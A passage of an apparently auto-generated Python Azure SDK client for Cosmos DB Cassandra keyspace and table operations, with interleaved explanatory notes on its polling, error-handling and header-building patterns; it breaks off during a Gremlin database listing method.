        """Gets the RUs per second of the Cassandra Keyspace under an existing
        Azure Cosmos DB database account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: Throughput or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.Throughput or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_cassandra_keyspace_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_cassandra_keyspace_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/settings/throughput'}

    def _update_cassandra_keyspace_throughput_initial(
            self, resource_group_name, account_name, keyspace_name, resource, custom_headers=None, raw=False, **operation_config):
        update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)

        # Construct URL
        url = self.update_cassandra_keyspace_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def update_cassandra_keyspace_throughput(
            self, resource_group_name, account_name, keyspace_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
        """Update RUs per second of an Azure Cosmos DB Cassandra Keyspace.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param resource: The standard JSON format of a resource throughput
        :type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns Throughput or
         ClientRawResponse<Throughput> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._update_cassandra_keyspace_throughput_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            resource=resource,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('Throughput', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    update_cassandra_keyspace_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/settings/throughput'}

    def list_cassandra_tables(
            self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
        """Lists the Cassandra table under an existing Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of CassandraTable
        :rtype:
         ~azure.mgmt.cosmosdb.models.CassandraTablePaged[~azure.mgmt.cosmosdb.models.CassandraTable]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_cassandra_tables.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
                    'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.CassandraTablePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_cassandra_tables.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables'}

    def get_cassandra_table(
            self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
        """Gets the Cassandra table under an existing Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: CassandraTable or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.CassandraTable or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_cassandra_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('CassandraTable', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}

    def _create_update_cassandra_table_initial(
            self, resource_group_name, account_name, keyspace_name, table_name, resource, options, custom_headers=None, raw=False, **operation_config):
        create_update_cassandra_table_parameters = models.CassandraTableCreateUpdateParameters(resource=resource, options=options)

        # Construct URL
        url = self.create_update_cassandra_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(create_update_cassandra_table_parameters, 'CassandraTableCreateUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('CassandraTable', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized


    def create_update_cassandra_table(
            self, resource_group_name, account_name, keyspace_name, table_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB Cassandra table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param resource: The standard JSON format of a Cassandra table
        :type resource: ~azure.mgmt.cosmosdb.models.CassandraTableResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for a personal polling strategy
        :return: An instance of LROPoller that returns CassandraTable or
         ClientRawResponse<CassandraTable> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.CassandraTable]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.CassandraTable]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_cassandra_table_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            table_name=table_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('CassandraTable', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}
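Every long-running operation in this client resolves its polling strategy the same way: `polling=True` selects the default ARM poller with the configured delay, `False` disables polling, and any other value is taken as a caller-supplied polling object. A minimal standalone sketch of that dispatch, with stub classes standing in for msrest's `ARMPolling`/`NoPolling` (the stub names are illustrative, not part of the SDK):

```python
class ArmPollingStub:
    """Stand-in for msrest.polling.ARMPolling (default ARM LRO poller)."""
    def __init__(self, timeout):
        self.timeout = timeout

class NoPollingStub:
    """Stand-in for msrest.polling.NoPolling (returns the initial response as-is)."""

def resolve_polling_method(polling, lro_delay):
    # polling=True -> default ARM polling with the configured retry delay
    if polling is True:
        return ArmPollingStub(lro_delay)
    # polling=False -> no polling at all
    if polling is False:
        return NoPollingStub()
    # anything else is assumed to be a ready-made polling strategy object
    return polling
```

The resolved method is then handed to `LROPoller` together with the initial raw response and the deserialization callback.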

    def _delete_cassandra_table_initial(
            self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete_cassandra_table.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete_cassandra_table(
            self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB Cassandra table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for a personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_cassandra_table_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            table_name=table_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}

    def get_cassandra_table_throughput(
            self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
        """Gets the RUs per second of the Cassandra table under an existing Azure
        Cosmos DB database account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: Throughput or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.Throughput or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_cassandra_table_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_cassandra_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}/settings/throughput'}
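Each operation above validates the response status against a per-operation allow-list and wraps anything else in a `CloudError` carrying the service's `x-ms-request-id` header. A hedged sketch of that pattern, with a plain exception standing in for `msrestazure.azure_exceptions.CloudError` (the stub and helper names are illustrative, not SDK API):

```python
class CloudErrorStub(Exception):
    """Stand-in for msrestazure.azure_exceptions.CloudError."""
    def __init__(self, status_code):
        super().__init__('Operation failed with status %d' % status_code)
        self.status_code = status_code
        self.request_id = None

def raise_for_status(status_code, expected_codes, headers):
    # Any status outside the operation's allow-list becomes a CloudError
    # annotated with the service-side request id for support diagnostics.
    if status_code not in expected_codes:
        exp = CloudErrorStub(status_code)
        exp.request_id = headers.get('x-ms-request-id')
        raise exp
```

The allow-list varies by verb: GETs accept `[200]`, the create/update PUTs accept `[200, 202]`, and the deletes accept `[202, 204]`.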

    def _update_cassandra_table_throughput_initial(
            self, resource_group_name, account_name, keyspace_name, table_name, resource, custom_headers=None, raw=False, **operation_config):
        update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)

        # Construct URL
        url = self.update_cassandra_table_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
            'tableName': self._serialize.url("table_name", table_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def update_cassandra_table_throughput(
            self, resource_group_name, account_name, keyspace_name, table_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
        """Update RUs per second of an Azure Cosmos DB Cassandra table.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param keyspace_name: Cosmos DB keyspace name.
        :type keyspace_name: str
        :param table_name: Cosmos DB table name.
        :type table_name: str
        :param resource: The standard JSON format of a resource throughput
        :type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for a personal polling strategy
        :return: An instance of LROPoller that returns Throughput or
         ClientRawResponse<Throughput> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._update_cassandra_table_throughput_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            keyspace_name=keyspace_name,
            table_name=table_name,
            resource=resource,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('Throughput', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    update_cassandra_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}/settings/throughput'}
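The header-construction block repeated in every operation follows one recipe: a JSON `Accept` header, a JSON `Content-Type` only when a body is serialized, a generated `x-ms-client-request-id`, caller overrides via `custom_headers`, then `accept-language`. A self-contained sketch of that recipe (the function name and flags are illustrative, not part of the SDK):

```python
import uuid

def build_request_headers(has_body=False, generate_request_id=True,
                          custom_headers=None, accept_language=None):
    headers = {'Accept': 'application/json'}
    # PUT operations that serialize a body also declare the content type
    if has_body:
        headers['Content-Type'] = 'application/json; charset=utf-8'
    # a fresh client request id lets the service correlate this call in logs
    if generate_request_id:
        headers['x-ms-client-request-id'] = str(uuid.uuid1())
    # caller-supplied headers are merged last among the generated ones,
    # so they can override the defaults (plain dict.update semantics)
    if custom_headers:
        headers.update(custom_headers)
    if accept_language is not None:
        headers['accept-language'] = accept_language
    return headers
```

Note that `accept-language` is applied after `custom_headers`, mirroring the order of the generated code above.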

    def list_gremlin_databases(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the Gremlin databases under an existing Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator-like instance of GremlinDatabase
        :rtype:
         ~azure.mgmt.cosmosdb.models.GremlinDatabasePaged[~azure.mgmt.cosmosdb.models.GremlinDatabase]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_gremlin_databases.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
